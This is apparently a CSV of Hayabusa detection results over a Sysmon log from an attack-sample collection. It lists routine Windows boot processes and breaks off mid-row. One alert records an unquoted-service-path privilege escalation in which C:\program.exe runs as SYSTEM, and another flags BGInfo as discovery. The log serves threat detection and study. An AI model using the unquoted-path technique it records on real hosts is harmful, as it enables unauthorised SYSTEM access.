+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 